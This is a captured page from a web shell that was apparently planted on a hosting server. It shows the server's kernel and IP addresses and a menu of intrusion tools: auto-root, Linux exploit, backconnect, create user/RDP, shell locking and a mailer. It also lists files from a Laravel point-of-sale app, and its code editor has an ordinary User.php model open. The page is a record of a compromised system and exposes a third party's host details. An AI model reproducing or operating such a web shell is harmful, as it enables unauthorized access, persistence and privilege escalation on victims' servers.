Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.69
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechvethouse.com /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
Charts
[ DIR ]
drwxr-xr-x
Console
[ DIR ]
drwxr-xr-x
Events
[ DIR ]
drwxr-xr-x
Exceptions
[ DIR ]
drwxr-xr-x
Exports
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
Listeners
[ DIR ]
drwxr-xr-x
Mail
[ DIR ]
drwxr-xr-x
Notifications
[ DIR ]
drwxr-xr-x
Providers
[ DIR ]
drwxr-xr-x
Restaurant
[ DIR ]
drwxr-xr-x
Utils
[ DIR ]
drwxr-xr-x
Account.php
3.93
KB
-rw-r--r--
AccountTransaction.php
4.35
KB
-rw-r--r--
AccountType.php
486
B
-rw-r--r--
Barcode.php
221
B
-rw-r--r--
Brands.php
1.03
KB
-rw-r--r--
Business.php
2.79
KB
-rw-r--r--
BusinessLocation.php
5.26
KB
-rw-r--r--
CashDenomination.php
230
B
-rw-r--r--
CashRegister.php
584
B
-rw-r--r--
CashRegisterTransaction.php
237
B
-rw-r--r--
Category.php
2.94
KB
-rw-r--r--
Contact.php
12.14
KB
-rw-r--r--
Currency.php
104
B
-rw-r--r--
CustomerGroup.php
1.08
KB
-rw-r--r--
DashboardConfiguration.php
116
B
-rw-r--r--
Discount.php
528
B
-rw-r--r--
DocumentAndNote.php
781
B
-rw-r--r--
ExpenseCategory.php
815
B
-rw-r--r--
GroupSubTax.php
213
B
-rw-r--r--
InvoiceLayout.php
1.06
KB
-rw-r--r--
InvoiceScheme.php
835
B
-rw-r--r--
Media.php
6.44
KB
-rw-r--r--
NotificationTemplate.php
17.07
KB
-rw-r--r--
PaymentAccount.php
730
B
-rw-r--r--
Printer.php
1.57
KB
-rw-r--r--
Product.php
5.35
KB
-rw-r--r--
ProductRack.php
225
B
-rw-r--r--
ProductVariation.php
452
B
-rw-r--r--
PurchaseLine.php
1.85
KB
-rw-r--r--
ReferenceCount.php
228
B
-rw-r--r--
SellingPriceGroup.php
1.6
KB
-rw-r--r--
StockAdjustmentLine.php
474
B
-rw-r--r--
System.php
2.35
KB
-rw-r--r--
TaxRate.php
2.67
KB
-rw-r--r--
Transaction.php
13.22
KB
-rw-r--r--
TransactionPayment.php
3.18
KB
-rw-r--r--
TransactionSellLine.php
2.61
KB
-rw-r--r--
TransactionSellLinesPurchaseLi...
375
B
-rw-r--r--
TypesOfService.php
762
B
-rw-r--r--
Unit.php
1.3
KB
-rw-r--r--
User.php
8.56
KB
-rw-r--r--
UserContactAccess.php
113
B
-rw-r--r--
Variation.php
1.64
KB
-rw-r--r--
VariationGroupPrice.php
233
B
-rw-r--r--
VariationLocationDetails.php
238
B
-rw-r--r--
VariationTemplate.php
398
B
-rw-r--r--
VariationValueTemplate.php
418
B
-rw-r--r--
Warranty.php
1.33
KB
-rw-r--r--
error_log
274
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : User.php
<?php namespace App; use DB; use Illuminate\Database\Eloquent\SoftDeletes; use Illuminate\Foundation\Auth\User as Authenticatable; use Illuminate\Notifications\Notifiable; use Illuminate\Support\Facades\Hash; use Spatie\Permission\Traits\HasRoles; use Laravel\Passport\HasApiTokens; class User extends Authenticatable { use Notifiable; use SoftDeletes; use HasRoles; use HasApiTokens; /** * The attributes that aren't mass assignable. * * @var array */ protected $guarded = ['id']; /** * The attributes that should be hidden for arrays. * * @var array */ protected $hidden = [ 'password', 'remember_token', ]; /** * The attributes that should be mutated to dates. * * @var array */ /** * Get the business that owns the user. */ public function business() { return $this->belongsTo(\App\Business::class); } public function scopeUser($query) { return $query->where('users.user_type', 'user'); } /** * The contact the user has access to. * Applied only when selected_contacts is true for a user in * users table */ public function contactAccess() { return $this->belongsToMany(\App\Contact::class, 'user_contact_access'); } /** * Get all of the users's notes & documents. */ public function documentsAndnote() { return $this->morphMany('App\DocumentAndNote', 'notable'); } /** * Creates a new user based on the input provided. * * @return object */ public static function create_user($details) { $user = User::create([ 'surname' => $details['surname'], 'first_name' => $details['first_name'], 'last_name' => $details['last_name'], 'username' => $details['username'], 'email' => $details['email'], 'password' => Hash::make($details['password']), 'language' => !empty($details['language']) ? $details['language'] : 'en' ]); return $user; } /** * Gives locations permitted for the logged in user * * @param: int $business_id * @return string or array */ public function permitted_locations($business_id = null) { $user = $this; if ($user->can('access_all_locations')) { return 'all'; } else { $business_id = !is_null($business_id) ? $business_id : request()->session()->get('user.business_id'); $permitted_locations = []; $all_locations = BusinessLocation::where('business_id', $business_id)->get(); foreach ($all_locations as $location) { if ($user->can('location.' . $location->id)) { $permitted_locations[] = $location->id; } } return $permitted_locations; } } /** * Returns if a user can access the input location * * @param: int $location_id * @return boolean */ public static function can_access_this_location($location_id, $business_id = null) { $permitted_locations = auth()->user()->permitted_locations($business_id); if ($permitted_locations == 'all' || in_array($location_id, $permitted_locations)) { return true; } return false; } public function scopeOnlyPermittedLocations($query) { $user = auth()->user(); $permitted_locations = $user->permitted_locations(); $is_admin = $user->hasAnyPermission('Admin#' . $user->business_id); if ($permitted_locations != 'all' && !$user->can('superadmin') && !$is_admin) { $permissions = ['access_all_locations']; foreach ($permitted_locations as $location_id) { $permissions[] = 'location.' . $location_id; } return $query->whereHas('permissions', function($q) use ($permissions) { $q->whereIn('permissions.name', $permissions); }); } else { return $query; } } /** * Return list of users dropdown for a business * * @param $business_id int * @param $prepend_none = true (boolean) * @param $include_commission_agents = false (boolean) * * @return array users */ public static function forDropdown($business_id, $prepend_none = true, $include_commission_agents = false, $prepend_all = false, $check_location_permission = false) { $query = User::where('business_id', $business_id) ->user(); if (!$include_commission_agents) { $query->where('is_cmmsn_agnt', 0); } if ($check_location_permission) { $query->onlyPermittedLocations(); } $all_users = $query->select('id', DB::raw("CONCAT(COALESCE(surname, ''),' ',COALESCE(first_name, ''),' ',COALESCE(last_name,'')) as full_name"))->get(); $users = $all_users->pluck('full_name', 'id'); //Prepend none if ($prepend_none) { $users = $users->prepend(__('lang_v1.none'), ''); } //Prepend all if ($prepend_all) { $users = $users->prepend(__('lang_v1.all'), ''); } return $users; } /** * Return list of sales commission agents dropdown for a business * * @param $business_id int * @param $prepend_none = true (boolean) * * @return array users */ public static function saleCommissionAgentsDropdown($business_id, $prepend_none = true) { $all_cmmsn_agnts = User::where('business_id', $business_id) ->where('is_cmmsn_agnt', 1) ->select('id', DB::raw("CONCAT(COALESCE(surname, ''),' ',COALESCE(first_name, ''),' ',COALESCE(last_name,'')) as full_name")); $users = $all_cmmsn_agnts->pluck('full_name', 'id'); //Prepend none if ($prepend_none) { $users = $users->prepend(__('lang_v1.none'), ''); } return $users; } /** * Return list of users dropdown for a business * * @param $business_id int * @param $prepend_none = true (boolean) * @param $prepend_all = false (boolean) * * @return array users */ public static function allUsersDropdown($business_id, $prepend_none = true, $prepend_all = false) { $all_users = User::where('business_id', $business_id) ->select('id', DB::raw("CONCAT(COALESCE(surname, ''),' ',COALESCE(first_name, ''),' ',COALESCE(last_name,'')) as full_name")); $users = $all_users->pluck('full_name', 'id'); //Prepend none if ($prepend_none) { $users = $users->prepend(__('lang_v1.none'), ''); } //Prepend all if ($prepend_all) { $users = $users->prepend(__('lang_v1.all'), ''); } return $users; } /** * Get the user's full name. * * @return string */ public function getUserFullNameAttribute() { return "{$this->surname} {$this->first_name} {$this->last_name}"; } /** * Return true/false based on selected_contact access * * @return boolean */ public static function isSelectedContacts($user_id) { $user = User::findOrFail($user_id); return (boolean)$user->selected_contacts; } public function getRoleNameAttribute() { $role_name_array = $this->getRoleNames(); $role_name = !empty($role_name_array[0]) ? explode('#', $role_name_array[0])[0] : ''; return $role_name; } public function media() { return $this->morphOne(\App\Media::class, 'model'); } /** * Find the user instance for the given username. * * @param string $username * @return \App\User */ public function findForPassport($username) { return $this->where('username', $username)->first(); } /** * Get the contact for the user. */ public function contact() { return $this->belongsTo(\Modules\Crm\Entities\CrmContact::class, 'crm_contact_id'); } /** * Get the products image. * * @return string */ public function getImageUrlAttribute() { if(isset($this->media->display_url)) { $img_src = $this->media->display_url; } else { $img_src = 'https://ui-avatars.com/api/?name='.$this->first_name; } return $img_src; } }
Close